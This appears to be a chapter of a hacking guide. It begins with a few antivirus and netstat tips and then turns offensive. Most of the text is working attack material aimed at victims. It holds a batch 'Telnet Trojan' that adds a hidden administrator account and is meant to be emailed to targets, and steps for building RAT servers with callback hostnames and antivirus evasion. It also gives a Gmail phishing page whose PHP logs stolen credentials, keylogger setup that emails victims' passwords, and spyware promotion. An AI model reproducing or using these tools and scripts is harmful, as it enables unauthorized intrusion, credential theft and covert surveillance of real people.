catching Malwares?

1. Choosing the Best Anti Virus Solution
First method to block virus and different type of malwares is using 2 anti viruses, and we prefer
these antiviruses for maximum security:

1. Avira Premium Security Suite
Download: www.thesecretofhacking.com/sw/ch2/antivir.zip

2. Avast v4.8 1335 Professional Edition
Download: www.thesecretofhacking.com/sw/ch2/avast.zip

2. Using Netstat command
Use netstat command in dos prompt to find out unwanted open ports:
c:\> netstat –no [enter]

Active Connections
Proto Local Address Foreign Address State PID
TCP 117.196.228.240:3468 209.85.153.104:80 ESTABLISHED 2088
TCP 117.196.228.240:3482 209.85.153.100:80 ESTABLISHED 2088

Use tasklist command to find out application related to PID(Process id).

To terminate process use; c:\> taskkill /PID 2088

3. Using Tools

1. Process explorer
Download URL: www.thesecretofhacking.com/sw/ch2/processexplorer.rar

2. Fport
Download URL: www.thesecretofhacking.com/sw/ch2/fport.exe

3. TcpView
Download URL: www.thesecretofhacking.com/sw/ch2/tcpview.exe

Video Demo: www.thesecretofhacking.com/vd/ch2/cs30

SPYWARE

Spyware is computer software that is installed surreptitiously on a personal computer to collect
information about a user, their computer or browsing habits without the user's informed consent.
While the term spyware suggests software that secretly monitors the user's behavior, the
functions of spyware extend well beyond simple monitoring. Spyware programs can collect
various types of personal information, such as Internet surfing habits and sites that have been
visited, but can also interfere with user control of the computer in other ways, such as installing
additional software and redirecting Web browser activity.

1. Spectersoft eBlaster
eBlaster is the most dependable, full-featured remote surveillance product available from the
world wide leader in Internet monitoring software. Robust and secure for the most demanding
businesses, yet easy for even computer novices to install and use effectively, eBlaster provides
both Instant Notification Email and Chat Alerts with Comprehensive Hourly and Daily Activity
Reports to give you the power and control to:
Record PC Activity, Including:

• Emails sent and received
• Both sides of Chats and Instant Messages
• Web Sites visited
• Sensitive Words and Phrases
• Every Keystroke typed
• Logon/Logoff activity

Download url: www.thesecretofhacking.com/sw/ch2/eblaster.rar

2. Buddy Spy
Buddy Spy allows you to monitor and keep track of what other Yahoo Messenger! users are doing,
even if they are in Invisible or Stealth Mode. The program shows if the user is online, what chat
room they are in (if any) and if their web cam is online. It is able to do this by connecting to Yahoo!
Messenger's servers and using its YMSG protocol. Sending carefully crafted packets, and listening to
their responses.


Download URL: www.buddy-spy.com



3. Real Spy Monitor 2.90 Portable

Real Spy Monitor can monitor all PC activity including keystrokes typed, web sites visited,
windows opened, program executed, screen snapshots, files/docs accessed and more. It can also
record instant messenger conversations including AOL, ICQ, MSN, AIM, Yahoo Messenger,
and capture web mail content from MSN, Hotmail, and Yahoo. The program can run in semistealth
mode (visible in Task Manager) and automatically send logs to a specified email address.
Additional features include screenshot capture and content filtering. The program does not
include any documentation. Because it is sold commercially, most anti-virus vendors do not
detect them. The most common form of a commercial monitoring tool comes in the form of a
keystroke logger, which intercepts keystrokes from the keyboard and records them in some form
of a log. This can then be sent to whoever installed the keystroke logger, or keylogger, onto the
machine.


Worried about how your PC is being used? Want to keep tabs on your children, spouse,
employees? Need to Prevent your children or employee from some application or web sites?
Real Spy Monitor is the full solution for you.



For example, you can use Real Spy Monitor to :
- Monitor Keystrokes typed, Websites visited, Windows viewed, Program executed, Screen
snapshots, Files/Docs accessed.
- Log Internet Chat conversation including AOL/ICQ/MSN/AIM Instant Messengers
- Spy Web Mail Content including MSN/HotMail, Yahoo! Mail
- Prevent your children or employee from some application or websites that include special
keywords.
- When you left your your PC, Record your PC actions and send them through Email delivery at
set times.


Download URL: www.thesecretofhacking.com/sw/ch2/realspy.rar


You can Download Many Applications free of cost from:

www.ddl2.com

ROOTKIT

Root kit is also a virus like Trojan for remote access of any system. Root kit is very powerful
as compared to Trojan because root kit implements on kernel level of any operating system,
which is hard to detect and delete.
Root kit is invisible in taskmanager as it hides itself.

Download Rootkits:

http://www.packetstormsecurity.org/UNIX/penetration/rootkits/

If you want to prevent your system from rootkit use Rootkit Hunter.

How to create Trojan virus with help of Lost door?

1. For LAN(Local area Network)
2. For WAN(Internet)
1. For LAN:
Open Lost door click on Create server button and then a dialog box appears where you
mention server own ip address---then…create)))) then server.exe will be created on lost door
folder .. then send this exe to target system for remote control.
For establishing the connection from server to victim.
Start your server>> just click start listen Button.
To control the victim system, right click and connect..

Video Demo: www.thesecretofhacking.com/vd/ch2/cs22

2. For WAN(Internet)
The Lost door has limitation for WAN, where our computer needs direct internet connection.
We can infect many remote users with help of email, orkut, chat (After download server.exe
that was created by Lost door).
When we create a server.exe our clients can communicate one time because our internet
service provider provides dynamic ip address .So to overcome this problem we sign up with
www.no-ip.com and provide static DNS for dynamic IP address.
Click No-Ip FREE: For Create a free hostname to point to your dynamic IP. (try now)
and fill the form and mention your email address and password and after add a host.
and download a client for change ip record on dns so that we mention hostname : ex:
sprithunter008.no-ip.biz .
use this host name in create a server address tab.


Video Demo: www.thesecretofhacking.com/vd/ch2/cs23

2. Net BUS Pro:
NetBus 2.0 Pro", (often just called "NetBus 2.0") the latest version of this well known backdoor
program, was announced on the homepage of C.F. Neikter for February 1999 - and was
published on February 19th. The latest version "NetBus 2.01 Pro" was published on April 5th. You can
download the setup-file of "NetBus 2.01 Pro" from this server.
"NetBus 2.0 Pro" was completely re-written and re-designed. It now has increased features and is
called "a remote administration and spy tool".

Download: http://www.netbus.org/

Note:
Free edition of Lost door and netbus can be detected from easily as virus so purchase private
edition of lost door and netbus for undetectable version, if you do not want to purchase private
edition, do hexa editing of server.exe.

Video: www.thesecretofhacking.com/vd/ch2/cshexa
18

We can create Trojan viruses with help of Trojan builders(RAT):

Best tools to create own Trojan (client) part and to control all infected machines are:
1. Lost door v3.0 Stable*
2. NetBus 2.0 Pro
1.Lost Door : Lost door is a remote administration tool for Microsoft Windows operating
systems. You can control and monitor remote computer easily and view what user does. Illegal
usage of this software is not allowed. Coder and related site is not responsible for any abuse of
the software.

Download: http://www.lostdoor.cn
Download: www.thesecretofhacking.com/sw/ch2/lostdoor.rar

Features:
[+] Reverse Connection
[+] Webcam Shot
[+] Date& time Manger
[+] printer
[+] Control pannel
[+] Pc control
[+] Exucutor
[+] Dos command
[+] Windows manager
[+] Screen Shot
[+] Remote server manager
[+] Server remover
[+] Ip Graber
[+] Server Downloader
[+] Icon Changer
[+] Audio Streaming
[+] Encrypt Settings
[+] Volume Control
[+] Connection Logs
[+] Instaled Appliction
[+] Infect All USB
[+] Multilanguage
[+] Invisible in Searching Files
[+] Services Viewer
[+] Remote passwords
[+] MSN Controler
[+] Remote Shell
[+] Chat with server
[+] Send fake messages
[+] files manager
[+] Find files
[+] Change remote screen resolution
[+] Information about remote computer
[+] Clipboard manager
[+] IE options
[+] Running Process
[+] Online keylogger
[+] Offline keylogger
[+] Fun Menu
[+] Remote Nat viewer
[+] Rmote Resotr Manager
[+] Added Some Graphics
[+] Some minor Bugs fixed
[+] Some Forms Has Been Modified
[+] News Navigator was Add

TROJAN

Trojan horse is also a type of virus which is used to control remote machine without system
owner knowledge. Trojan has two parts : 1. server 2. client , Server handles all infected remote
computers' connections and client is used to infect victim computer system. Every Trojan has its
associated port number for communication over internet or LAN.

Video Demo: www.thesecretofhacking.com/vd/ch2/cs21

Telnet Trojan Target : All windows XP machines.

Features: Fully undetectable for all antiviruses.
---------------------------------------------------------------------------------------------------------------------
echo off
sc config TlntSvr start= auto
sc start TlntSvr
tlntadmn config sec=-NTLM
tlntadmn config mode=stream
net user leoimpact /add
net user leoimpact leo123
net localgroup administrators leoimpact /add
exit


Write the above code in the notepad and save as myvirus.bat and send it through email, pen
drive, etc to other system for remote control.

Action: After executing the above script a user leoimpact is created and its password is: leo123 and
then telnet port will open with full administrative rights.

Note: The limitation of the above script is that the user will be visible on the target system. But
we can hide the user with help of downloading and executing the

www.thesecretofhacking.com/sw/ch2/hide.reg

This script has another limitation which shows a prompt which may caution the target system
user but we can hide prompt window with help of BAT to EXE converter.
[Download link: www.thesecretofhacking.com/sw/ch2/bat.zip ]

How to Connect Remote Machine:
C:\> Telnet remotemachineipaddress [enter]

Example how to create gmail phishing page.

Step 1.
Go to http://gmail.com
Click File>Save Page As... or Ctrl+ S and save page.


Once you saved, rename ServiceLogin.htm to index.htm so when you upload it to a web
host and someone goes to your link, the index page is the first page that
shows up.

Step 2.
Open text editor and add this code:

PHP Code:

<?php
header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');
$handle = fopen("logs.txt", "a");
foreach($_POST as $variable => $value) {
 fwrite($handle, $variable);
 fwrite($handle, "=");
 fwrite($handle, $value);
 fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save it as mail.php

Now create simple text document and name it logs.txt
Open logs.txt and this:

Code:

ltmpl=default

ltmplcache=2

continue=http://mail.google.com/mail/?

service=mail

rm=false

Email=victim@gmail.com

Passwd=victimpassword

rmShown=1

signIn=Sign in

Step 3.
Open index.htm with text editor and find this line:
Change it to this and save it:

PHP Code:

 <form id="gaia_loginform" action="mail.php" method="post"> 

Step 4.
By now you will have 4files
Upload them all to your hosting
And you are done!

Use Gmail as a Hard Drive

 Gmail Drive creates a virtual file system around your Google Mail account, allowing you to use Gmail as a storage medium.

http://www.filehippo.com/download_gmail_drive/

Gspace

 Gspace is a Firefox plugin that allows you to use your Gmail account for online storage. File extensions are not an issue; you can upload any type of file which includes music files to stream directly with this Firefox extension.

http://www.getgspace.com

Hack Gmail Account password with Key Logger

First Download Rin Logger from http://goo.gl/ruV2J Run the keylogger file on your pc and click on “Create new”

Now, enter the information as follows: Email address: your email address (gmail recommended) Account Password: Password of your Email address. Keylogger Recipients: Enter your Email address

Click on next

Now Enable the Attach Screenshots by hitting on it. Enter the duration (time in minutes) to receive email Key logs. After that hit "verify now” If you get a message saying verified, your good to go, click next

Now enable the “Install Keylogger” by clicking on it. Name the file anything you want and select Installation path as “Application Data”, click next

Click on Next

Now, “Enable Website Viewer” by clicking on it.

 Click on Next option.

Now, Enable the “Enable File Binder”.

Click on next.

Now Enable the “Steal Password”

Click on Next

Fill all the information by yourself.

And click on next.

Now, hit on “Save As” and select the location where you want to save your keylogger server file. And click on “Compile Server”. Now Compile has been done.

You have successfully created a keylogger server file. Now, simply send this file to your victim via email, once the victim runs our keylogger, we will key logs every 10 min via email.

How to View Hidden Password behind

 **** You can use this script when someone has checked the remember me button in the login form of any website and to reveal password from that saved asterisk or encrypted password. After opening the web page paste the JavaScript given below in the address bar and hit enter

javascript:(function(){var%20s,F,j,f,i;%20s%20=%20%22%22; %20F%20=%20document.forms;%20for(j=0;%20j<F.length;%20++j) %20{%20f%20=%20F[j];%20for%20(i=0;%20i<f.length;%20++i) %20{%20if%20(f[i].type.toLowerCase()%20==%20%22password%22) %20s%20+=%20f[i].value%20+%20%22\n%22;%20}%20}%20if %20(s)%20alert(%22Passwords%20in%20forms%20on%20this %20page:\n\n%22%20+%20s);%20else%20alert(%22There%20are %20no%20passwords%20in%20forms%20on%20this %20page.%22);})();